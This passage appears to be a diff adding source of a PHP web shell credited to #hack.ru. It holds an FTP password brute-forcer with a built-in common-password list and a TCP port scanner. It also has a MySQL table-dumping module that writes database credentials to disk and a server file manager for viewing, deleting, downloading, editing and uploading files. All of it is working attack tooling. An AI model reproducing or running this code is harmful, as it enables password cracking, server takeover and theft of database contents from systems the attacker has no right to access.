+function name9() {   return s().g().s().g().s().g();            }
+
+function name10() {   return s().g().s().s().g().s().s();        }
+
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+
+
+function randword() {
+
+   global $cool;
+
+   $func="name".mt_rand(0,11);
+
+   $func2="name".mt_rand(0,11);
+
+   switch (mt_rand(0,11)) {
+
+      case 0: return $func().mt_rand(5,99);
+
+      case 1: return $func()."-".$func2();
+
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+
+      case 3: return $func()."!".$func();
+
+      case 4: return randpass(mt_rand(5,12));
+
+      default: return $func();
+
+   }
+
+
+
+
+
+}
+
+
+
+function randpass($len) {
+
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+
+   $s="";
+
+   for ($i=0; $i<$len; $i++) {
+
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+
+   }
+
+   return $s;
+
+}
+
+if (@unlink("pass.txt") < 0){
+
+echo "nothing";
+
+exit;
+
+}
+
+$file="pass.txt";
+
+if($file && $host && $login){
+
+   $cn=mt_rand(30,30);
+
+for ($i=0; $i<$cn; $i++) {
+
+   $s=$cool2[$i];
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$s\n");
+
+   }
+
+
+
+  $cnt2=mt_rand(43,43);
+
+for ($i=0; $i<$cnt2; $i++) {
+
+   $r=$cool[$i];
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$login$r\n");
+
+}
+
+$p="$proverka";
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$p\n");
+
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+
+   for ($i=0; $i<$cnt3; $i++) {
+
+   $u=randword();
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$u\n");
+
+  }
+
+
+
+  if(is_file($file)){
+
+ $passwd=file($file,1000);
+
+  for($i=0; $i<count($passwd); $i++){
+
+   $stop=false;
+
+   $password=trim($passwd[$i]);
+
+   $open_ftp=@fsockopen($host,21);
+
+    if($open_ftp!=false){
+
+     fputs($open_ftp,"user $login\n");
+
+     fputs($open_ftp,"pass $password\n");
+
+     while(!feof($open_ftp) && $stop!=true){
+
+      $text=fgets($open_ftp,4096);
+
+      if(preg_match("/230/",$text)){
+
+       $stop=true;
+
+	   $f=@fopen($host._ftp,"a+");
+
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+
+
+       echo "
+
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b><font color=\"blue\">Congratulations! Password is known now.</font></b><br>
+
+&nbsp;&nbsp;Connected to: <b>$host</b><br>&nbsp;&nbsp;with login: <b>$login</b><br>&nbsp;&nbsp;with password: <b>$password</b></td></tr></table>
+
+";exit;
+
+      }
+
+      elseif(preg_match("/530/",$text)){
+
+       $stop=true;
+
+
+
+      }
+
+     }
+
+     fclose($open_ftp);
+
+   }else{
+
+    echo "
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>FTP is incorrect!!! At <b><u>$host</u></b> 21 port is closed! check your settings</b></b></td></tr>
+
+</table>
+
+";exit;
+
+   }
+
+  }
+
+ }
+
+}
+
+
+
+}
+
+
+
+# port scanner
+
+function portscan() {
+
+ global $action,$portscan,$port,$HTTP_HOST,$min,$max;
+
+
+
+ $mtime = explode(" ",microtime());
+
+ $mtime = $mtime[1] + $mtime[0];
+
+ $time1 = $mtime;
+
+
+
+ $id = $HTTP_HOST;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Scan results:</b>&nbsp;&nbsp;$id</td></tr><tr><td valign=top class=pagetitle >Scanning host to find any reachable and open ports" . "...<br></td></tr></table>";
+
+
+
+ $lport = $min;
+
+ $hport = $max;
+
+ $op = 0;
+
+ $gp = 0;
+
+
+
+ for ($porta=$lport; $porta<=$hport; $porta++) {
+
+  $fp = @fsockopen("$id", $porta, &$errno, &$errstr, 4);
+
+  if ( !$fp ) { $gp++; }
+
+  else {
+
+   $port_addres = $port[$porta];
+
+   if($port_addres == "") $port_addres = "unknown";
+
+   $serv = getservbyport($porta, TCP);
+
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#FFFFCC BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center width=10%>Port:<b>$porta / $serv</b></td><td align=center width=80%>$port_addres</td><td align=center width=10%>(<a href=\"http://www.google.de/search?q=%22$port_addres2%22&ie=ISO-8859-1&hl=de&btnG=Google+Suche&meta=\" target=_blank>What's the service is?</a>)</td></tr>";
+
+   $op++;
+
+  }
+
+ }
+
+
+
+ if($op == 0) echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Current host seems don't have any open port...hmm, but you're connected to it to 80...check out firewall</b></td></tr></table>";
+
+
+
+ $unsi = ($op/$porta)*100;
+
+ $unsi = round($unsi);
+
+
+
+ echo "<tr><td align=center width=100% bgcolor=#184984 class=pagetitle colspan=3><b>Scan statistics:</b></b></td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Scanned ports:</b>&nbsp;&nbsp;$porta</td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Open ports:</b>&nbsp;&nbsp;$op</td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Closed ports:</b>&nbsp;&nbsp;$gp</td></tr>";
+
+
+
+ $mtime = explode(" ",microtime());
+
+ $mtime = $mtime[1] + $mtime[0];
+
+ $time2 = $mtime;
+
+ $loadtime = ($time2 - $time1);
+
+ $loadtime = round($loadtime, 2);
+
+
+
+ echo "<tr colspan=2><td align=center width=100% colspan=3><b>Scan time:</b>&nbsp;&nbsp;$loadtime seconds</tr></table>";
+
+}
+
+
+
+function nfm_copyright() {
+
+global $action,$upass,$uname,$nfm;
+
+ return "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#000000' face='Tahoma' size = 2><b>Powered by channel #hack.ru (author xoce). Made In Russia </b></font></center></td></tr></table></body></html>";
+
+
+
+}
+
+// =-=-=-=-= SQL MODULE =-=-=-=-=
+
+// SQL functions start
+
+function aff_date() {
+
+ $date_now=date("F j,Y,g:i a");
+
+ return $date_now;
+
+}
+
+
+
+function sqldumptable($table) {
+
+ global $sv_s,$sv_d,$drp_tbl;
+
+ $tabledump = "";
+
+ if ($sv_s) {
+
+  if ($drp_tbl) { $tabledump.="DROP TABLE IF EXISTS $table;\n"; }
+
+  $tabledump.="CREATE TABLE $table (\n";
+
+  $firstfield=1;
+
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+
+  while ($champ=mysql_fetch_array($champs)) {
+
+   if (!$firstfield) { $tabledump.=",\n"; }
+
+   else { $firstfield=0;}
+
+   $tabledump.=" $champ[Field] $champ[Type]";
+
+   if ($champ['Null'] !="YES") { $tabledump.=" NOT NULL";}
+
+   if (!empty($champ['Default'])) { $tabledump.=" default '$champ[Default]'";}
+
+   if ($champ['Extra'] !="") { $tabledump.=" $champ[Extra]";}
+
+  }
+
+
+
+  @mysql_free_result($champs);
+
+  $keys=mysql_query("SHOW KEYS FROM $table");
+
+  while ($key=mysql_fetch_array($keys)) {
+
+   $kname=$key['Key_name'];
+
+   if ($kname !="PRIMARY" and $key['Non_unique']==0) { $kname="UNIQUE|$kname";}
+
+   if(!is_array($index[$kname])) { $index[$kname]=array();}
+
+   $index[$kname][]=$key['Column_name'];
+
+  }
+
+
+
+  @mysql_free_result($keys);
+
+  while(list($kname,$columns)=@each($index)) {
+
+   $tabledump.=",\n";
+
+   $colnames=implode($columns,",");
+
+   if($kname=="PRIMARY") { $tabledump.=" PRIMARY KEY ($colnames)";}
+
+   else {
+
+    if (substr($kname,0,6)=="UNIQUE") { $kname=substr($kname,7);}
+
+    $tabledump.=" KEY $kname ($colnames)";
+
+   }
+
+  }
+
+  $tabledump.="\n);\n\n";
+
+ }
+
+
+
+ if ($sv_d) {
+
+  $rows=mysql_query("SELECT * FROM $table");
+
+  $numfields=mysql_num_fields($rows);
+
+  while ($row=mysql_fetch_array($rows)) {
+
+   $tabledump.="INSERT INTO $table VALUES(";
+
+   $cptchamp=-1;
+
+   $firstfield=1;
+
+   while (++$cptchamp<$numfields) {
+
+    if (!$firstfield) { $tabledump.=",";}
+
+    else { $firstfield=0;}
+
+    if (!isset($row[$cptchamp])) {$tabledump.="NULL";}
+
+    else { $tabledump.="'".mysql_escape_string($row[$cptchamp])."'";}
+
+   }
+
+   $tabledump.=");\n";
+
+  }
+
+  @mysql_free_result($rows);
+
+ }
+
+
+
+ return $tabledump;
+
+}
+
+
+
+function csvdumptable($table) {
+
+ global $sv_s,$sv_d;
+
+ $csvdump="## Table:$table \n\n";
+
+ if ($sv_s) {
+
+  $firstfield=1;
+
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+
+  while ($champ=mysql_fetch_array($champs)) {
+
+   if (!$firstfield) { $csvdump.=",";}
+
+   else { $firstfield=0;}
+
+   $csvdump.="'".$champ['Field']."'";
+
+  }
+
+
+
+  @mysql_free_result($champs);
+
+  $csvdump.="\n";
+
+ }
+
+
+
+ if ($sv_d) {
+
+  $rows=mysql_query("SELECT * FROM $table");
+
+  $numfields=mysql_num_fields($rows);
+
+  while ($row=mysql_fetch_array($rows)) {
+
+   $cptchamp=-1;
+
+   $firstfield=1;
+
+   while (++$cptchamp<$numfields) {
+
+    if (!$firstfield) { $csvdump.=",";}
+
+    else { $firstfield=0;}
+
+    if (!isset($row[$cptchamp])) { $csvdump.="NULL";}
+
+    else { $csvdump.="'".addslashes($row[$cptchamp])."'";}
+
+   }
+
+   $csvdump.="\n";
+
+  }
+
+ }
+
+
+
+ @mysql_free_result($rows);
+
+ return $csvdump;
+
+}
+
+
+
+function write_file($data) {
+
+ global $g_fp,$file_type;
+
+ if ($file_type==1) { gzwrite($g_fp,$data); }
+
+ else { fwrite ($g_fp,$data); }
+
+}
+
+
+
+function open_file($file_name) {
+
+ global $g_fp,$file_type,$dbbase,$f_nm;
+
+ if ($file_type==1) { $g_fp=gzopen($file_name,"wb9"); }
+
+ else { $g_fp=fopen ($file_name,"w"); }
+
+
+
+ $f_nm[]=$file_name;
+
+ $data="";
+
+ $data.="##\n";
+
+ $data.="## NFM hack.ru creator \n";
+
+ $data.="##-------------------------\n";
+
+ $data.="## Date:".aff_date()."\n";
+
+ $data.="## Base:$dbbase \n";
+
+ $data.="##-------------------------\n\n";
+
+ write_file($data);
+
+ unset($data);
+
+}
+
+
+
+function file_pos() {
+
+ global $g_fp,$file_type;
+
+ if ($file_type=="1") { return gztell ($g_fp); }
+
+ else { return ftell ($g_fp); }
+
+}
+
+
+
+function close_file() {
+
+ global $g_fp,$file_type;
+
+ if ($file_type=="1") { gzclose ($g_fp); }
+
+ else { fclose ($g_fp); }
+
+}
+
+
+
+function split_sql_file($sql) {
+
+ $morc=explode(";",$sql);
+
+ $sql="";
+
+ $output=array();
+
+ $matches=array();
+
+ $morc_cpt=count($morc);
+
+ for ($i=0;$i < $morc_cpt;$i++) {
+
+  if (($i !=($morc_cpt-1)) || (strlen($morc[$i] > 0))) {
+
+   $total_quotes=preg_match_all("/'/",$morc[$i],$matches);
+
+   $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$i],$matches);
+
+   $unescaped_quotes=$total_quotes-$escaped_quotes;
+
+   if (($unescaped_quotes % 2)==0) { $output[]=$morc[$i]; $morc[$i]=""; }
+
+   else {
+
+    $temp=$morc[$i].";";
+
+    $morc[$i]="";
+
+    $complete_stmt=false;
+
+    for ($j=$i+1;(!$complete_stmt && ($j < $morc_cpt));$j++) {
+
+     $total_quotes = preg_match_all("/'/",$morc[$j],$matches);
+
+     $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$j],$matches);
+
+     $unescaped_quotes=$total_quotes-$escaped_quotes;
+
+     if (($unescaped_quotes % 2)==1) {
+
+      $output[]=$temp.$morc[$j];
+
+      $morc[$j]="";
+
+      $temp="";
+
+      $complete_stmt=true;
+
+      $i=$j;
+
+     } else {
+
+      $temp.=$morc[$j].";";
+
+      $morc[$j]="";
+
+     }
+
+    }
+
+   }
+
+  }
+
+ }
+
+ return $output;
+
+}
+
+
+
+function split_csv_file($csv) { return explode("\n",$csv); }
+
+// SQL functions END
+
+
+
+// main SQL()
+
+function sql() {
+
+ global $sqlaction,$sv_s,$sv_d,$drp_tbl,$g_fp,$file_type,$dbbase,$f_nm;
+
+ $secu_config="xtdump_conf.inc.php";
+
+ $dbhost=$_POST['dbhost'];
+
+ $dbuser=$_POST['dbuser'];
+
+ $dbpass=$_POST['dbpass'];
+
+ $dbbase=$_POST['dbbase'];
+
+ $tbls =$_POST['tbls'];
+
+ $sqlaction =$_POST['sqlaction'];
+
+ $secu =$_POST['secu'];
+
+ $f_cut =$_POST['f_cut'];
+
+ $fz_max =$_POST['fz_max'];
+
+ $opt =$_POST['opt'];
+
+ $savmode =$_POST['savmode'];
+
+ $file_type =$_POST['file_type'];
+
+ $ecraz =$_POST['ecraz'];
+
+ $f_tbl =$_POST['f_tbl'];
+
+ $drp_tbl=$_POST['drp_tbl'];
+
+
+
+ $header="<center><table width=620 cellpadding=0 cellspacing=0 align=center><col width=1><col width=600><col width=1><tr><td></td><td align=left class=texte><br>";
+
+ $footer="<center><a href='javascript:history.go(-1)' target='_self' class=link>-go back-</a><br></center><br></td><td></td></tr><tr><td height=1 colspan=3></td></tr></table></center>".nfm_copyright();
+
+
+
+ // SQL actions STARTS
+
+
+
+ if ($sqlaction=='save') {
+
+  if ($secu==1) {
+
+   $fp=fopen($secu_config,"w");
+
+   fputs($fp,"<?php\n");
+
+   fputs($fp,"\$dbhost='$dbhost';\n");
+
+   fputs($fp,"\$dbbase='$dbbase';\n");
+
+   fputs($fp,"\$dbuser='$dbuser';\n");
+
+   fputs($fp,"\$dbpass='$dbpass';\n");
+
+   fputs($fp,"?>");
+
+   fclose($fp);
+
+  }
+
+  if (!is_array($tbls)) {
+
+   echo $header."<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">
+
+<br><center><font color=red>You forgot to check tables, which you need to dump =)</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+  if($f_cut==1) {
+
+   if (!is_numeric($fz_max)) {
+
+    echo $header."<br><center><font color=red><b>Veuillez choisir une valeur num?rique ? la taille du fichier ? scinder.</b></font></center>\n$footer";
+
+    exit;
+
+   }
+
+   if ($fz_max < 200000) {
+
+    echo $header."<br><center><font color=red><b>Veuillez choisir une taille de fichier a scinder sup
+
+    rieure ? 200 000 Octets.</b></font></center>\n$footer";
+
+    exit;
+
+   }
+
+  }
+
+
+
+  $tbl=array();
+
+  $tbl[]=reset($tbls);
+
+  if (count($tbls) > 1) {
+
+   $a=true;
+
+   while ($a !=false) {
+
+    $a=next($tbls);
+
+    if ($a !=false) { $tbl[]=$a; }
+
+   }
+
+  }
+
+
+
+  if ($opt==1) { $sv_s=true; $sv_d=true; }
+
+  else if ($opt==2) { $sv_s=true;$sv_d=false;$fc ="_struct"; }
+
+  else if ($opt==3) { $sv_s=false;$sv_d=true;$fc ="_data"; }
+
+  else { exit; }
+
+
+
+  $fext=".".$savmode;
+
+  $fich=$dbbase.$fc.$fext;
+
+  $dte="";
+
+  if ($ecraz !=1) { $dte=date("dMy_Hi")."_"; } $gz="";
+
+  if ($file_type=='1') { $gz.=".gz"; }
+
+  $fcut=false;
+
+  $ftbl=false;
+
+  $f_nm=array();
+
+  if($f_cut==1) { $fcut=true;$fz_max=$fz_max;$nbf=1;$f_size=170;}
+
+  if($f_tbl==1) { $ftbl=true; }
+
+  else {
+
+   if(!$fcut) { open_file("dump_".$dte.$dbbase.$fc.$fext.$gz); }
+
+   else { open_file("dump_".$dte.$dbbase.$fc."_1".$fext.$gz); }
+
+  }
+
+
+
+  $nbf=1;
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+
+  mysql_select_db($dbbase);
+
+  if ($fext==".sql") {
+
+   if ($ftbl) {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=sqldumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut) {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);
+
+      $nbf=0;
+
+      $p_sql=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_sql)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); }
+
+       else { close_file(); $nbf++; open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".sql".$gz); write_file($val.";"); }
+
+      }
+
+      close_file();
+
+     }
+
+     else { open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);write_file($temp."\n\n");close_file();$nbf=1; }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   } else {
+
+    $tblsv="";
+
+    while (list($i)=each($tbl)) {
+
+     $temp=sqldumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut && ((file_pos()+$sz_t) > $fz_max)) {
+
+      $p_sql=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_sql)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".sql".$gz);
+
+        write_file($val.";");
+
+       }
+
+      }
+
+     } else { write_file($temp); }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   }
+
+  }
+
+  else if ($fext==".csv") {
+
+   if ($ftbl) {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=csvdumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut) {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+
+      $nbf=0;
+
+      $p_csv=split_csv_file($temp);
+
+      while(list($j,$val)=each($p_csv)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".csv".$gz);
+
+        write_file($val."\n");
+
+       }
+
+      }
+
+      close_file();
+
+     } else {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+
+      write_file($temp."\n\n");
+
+      close_file();
+
+      $nbf=1;
+
+     }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   } else {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=csvdumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut && ((file_pos()+$sz_t) > $fz_max)) {
+
+      $p_csv=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_csv)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".csv".$gz);
+
+        write_file($val."\n");
+
+       }
+
+      }
+
+     } else { write_file($temp); }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   }
+
+  }
+
+
+
+  mysql_close();
+
+  if (!$ftbl) { close_file(); }
+
+
+
+  echo $header;
+
+  echo "<br><center>All the data in these tables:<br> ".$tblsv." were putted to this file:<br><br></center><table border='0' align='center' cellpadding='0' cellspacing='0'><col width=1 bgcolor='#2D7DA7'><col valign=center><col width=1 bgcolor='#2D7DA7'><col valign=center align=right><col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>File</b></font></td><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>Size</b></font></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  reset($f_nm);
+
+  while (list($i,$val)=each($f_nm)) {
+
+   $coul='#99CCCC';
+
+   if ($i % 2) { $coul='#CFE3E3'; }
+
+   echo "<tr><td></td><td bgcolor=".$coul." class=texte>&nbsp;<a href='".$val."' class=link target='_blank'>".$val."&nbsp;</a></td><td></td>";
+
+   $fz_tmp=filesize($val);
+
+   if ($fcut && ($fz_tmp > $fz_max)) {
+
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1 color=red>".$fz_tmp." Octets</font>&nbsp;</td><td></td></tr>";
+
+   } else {
+
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1>".$fz_tmp." bites</font>&nbsp;</td><td></td></tr>";
+
+   }
+
+   echo "<tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  }
+
+  echo "</table><br>";
+
+  echo $footer;exit;
+
+ }
+
+
+
+ if ($sqlaction=='connect') {
+
+  if(!@mysql_connect($dbhost,$dbuser,$dbpass)) {
+
+   echo $header."<br><center><font color=red><b>Unable to connect! Check your data input!</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+
+
+  if(!@mysql_select_db($dbbase)) {
+
+   echo $header."<br><center><font color=red><<b>Unable to connect! Check your data input!</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+
+
+  if ($secu==1) {
+
+   if (!file_exists($secu_config)) {
+
+    $fp=fopen($secu_config,"w");
+
+    fputs($fp,"<?php\n");
+
+    fputs($fp,"\$dbhost='$dbhost';\n");
+
+    fputs($fp,"\$dbbase='$dbbase';\n");
+
+    fputs($fp,"\$dbuser='$dbuser';\n");
+
+    fputs($fp,"\$dbpass='$dbpass';\n");
+
+    fputs($fp,"?>");
+
+    fclose($fp);
+
+   }
+
+   include($secu_config);
+
+  } else {
+
+   if (file_exists($secu_config)) { unlink($secu_config); }
+
+  }
+
+
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+
+  $tables=mysql_list_tables($dbbase);
+
+  $nb_tbl=mysql_num_rows($tables);
+
+
+
+  echo $header."<script language='javascript'> function checkall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=true;i=i+1;} } function decheckall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=false;i=i+1;} } </script><center><br><b>Choose tables you need to dump!</b><form action='' method='post' name=formu><input type='hidden' name='sqlaction' value='save'><input type='hidden' name='dbhost' value='$dbhost'><input type='hidden' name='dbbase' value='$dbbase'><input type='hidden' name='dbuser' value='$dbuser'><input type='hidden' name='dbpass' value='$dbpass'><DIV ID='infobull'></DIV><table border='0' width='400' align='center' cellpadding='0' cellspacing='0' class=texte><col width=1 bgcolor='#2D7DA7'><col width=30 align=center valign=center><col width=1 bgcolor='#2D7DA7'><col width=350> <col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#336699'><input type='checkbox' name='selc' alt='Check all' onclick='if (document.formu.selc.checked==true){checkall();}else{decheckall();}')\"></td><td></td><td bgcolor='#338CBD' align=center><B>Table names</b></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+
+
+  $i=0;
+
+  while ($i < mysql_num_rows ($tables)) {
+
+   $coul='#99CCCC';
+
+   if ($i % 2) { $coul='#CFE3E3';}
+
+   $tb_nom=mysql_tablename ($tables,$i);
+
+   echo "<tr><td></td><td bgcolor='".$coul."'><input type='checkbox' name='tbls[".$i."]' value='".$tb_nom."'></td><td></td><td bgcolor='".$coul."'>&nbsp;&nbsp;&nbsp;".$tb_nom."</td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+   $i++;
+
+  }
+
+
+
+  mysql_close();
+
+  echo "</table><br><br><table align=center border=0><tr><td align=left class=texte> <hr> <input type='radio' name='savmode' value='csv'>
+
+  Save to csv (*.<i>csv</i>)<br> <input type='radio' name='savmode' value='sql' checked>
+
+  Save to Sql (*.<i>sql</i>)<br> <hr> <input type='radio' name='opt' value='1' checked>
+
+  Save structure and data<br> <input type='radio' name='opt' value='2'>
+
+  Save structure only<br> <input type='radio' name='opt' value='3'>
+
+  Save data only<br> <hr> <input type='Checkbox' name='drp_tbl' value='1' checked>
+
+  Rewrite file if exists<br>  <input type='Checkbox' name='ecraz' value='1' checked>
+
+  Clear database after dump<br> <input type='Checkbox' name='f_tbl' value='1'>
+
+  Put each table to a separate file<br> <input type='Checkbox' name='f_cut' value='1'>
+
+  Maximum dump-file size: <input type='text' name='fz_max' value='200000' class=form>
+
+  Octets<br> <input type='Checkbox' name='file_type' value='1'>
+
+  Gzip.<br>
+
+  </td></tr></table><br><br><input type='submit' value=' Dump:) ' class=form></form></center>$footer";
+
+  exit;
+
+ }
+
+
+
+// SQL actions END
+
+
+
+ if(file_exists($secu_config)) {
+
+  include ($secu_config);
+
+  $ck="checked";
+
+ } else {
+
+  $dbhost="localhost";
+
+  $dbbase="";
+
+  $dbuser="root";
+
+  $dbpass="";
+
+  $ck="";
+
+ }
+
+
+
+ echo $header."
+
+<center><br><br>
+
+<table width=620 cellpadding=0 cellspacing=0 align=center>
+
+ <col width=1>
+
+ <col width=600>
+
+ <col width=1>
+
+ <tr>
+
+  <td></td>
+
+  <td align=left class=texte>
+
+   <br>
+
+   <form action='' method='post'>
+
+   <input type='hidden' name='sqlaction' value='connect'>
+
+   <table border=0 align=center>
+
+    <col>
+
+    <col align=left>
+
+    <tr>
+
+     <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>Enter data to connect to MySQL server!<br><br></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Server address:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Base name:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Login:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Password</td>
+
+     <td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td>
+
+    </tr>
+
+   </table>
+
+   <br> <center> <br><br>
+
+   <input type='submit' value=' Connect ' class=form></center> </form> <br><br>
+
+  </td>
+
+  <td></td>
+
+ </tr>
+
+ <tr>
+
+  <td height=1 colspan=3></td>
+
+ </tr>
+
+</table>
+
+</center>";
+
+
+
+}
+
+// SQL END
+
+
+
+/* main() */
+
+set_time_limit(0);
+
+
+
+if ( $action !="download") print("$HTML");
+
+
+
+if (!isset($cm)) {
+
+ if (!isset($action)) {
+
+  if (!isset($tm)) { $tm = getcwd(); }
+
+  $curdir = getcwd();
+
+  if (!@chdir($tm)) exit("<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>Access to directory is denied, see CHMOD.</td></tr></table>");
+
+  getdir();
+
+  chdir($curdir);
+
+  $supsub = $gdir[$j-1];
+
+  if (!isset($tm) ) { $tm=getcwd();}
+
+  readdirdata($tm);
+
+ } else {
+
+  switch ($action) {
+
+   case "view":
+
+    viewfile($tm,$fi);
+
+    break;
+
+   case "delete":
+
+    echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fi</b> was deleted successfully.</font></center></td></tr></table>";
+
+    deletef($tm);
+
+    break;
+
+   case "download":
+
+   if (isset($fatt) && strlen($fatt)>0) {
+
+    $attach=$fatt;
+
+    header("Content-type: text/plain");
+
+   }
+
+   else {
+
+    $attach=$fi;
+
+    header("Content-type: hackru");
+
+   }
+
+   header("Content-disposition: attachment; filename=\"$attach\";");
+
+   readfile($tm."/".$fi);
+
+   break;
+
+   case "download_mail":
+
+   download_mail($tm,$fi);
+
+   break;
+
+   case "edit":
+
+   editfile($tm,$fi);
+
+   break;
+
+  case "save":
+
+   savefile($tm,$fi);
+
+   break;
+
+  case "uploadd":
+
+   uploadtem();
+
+   break;
+
+  case "up":
+
+   up($tm);
+
+   break;
+
+  case "newdir":
+
+   newdir($tm);
+
+   break;
+
+  case "createdir":
+
+   cdir($tm);
+
+   break;
+
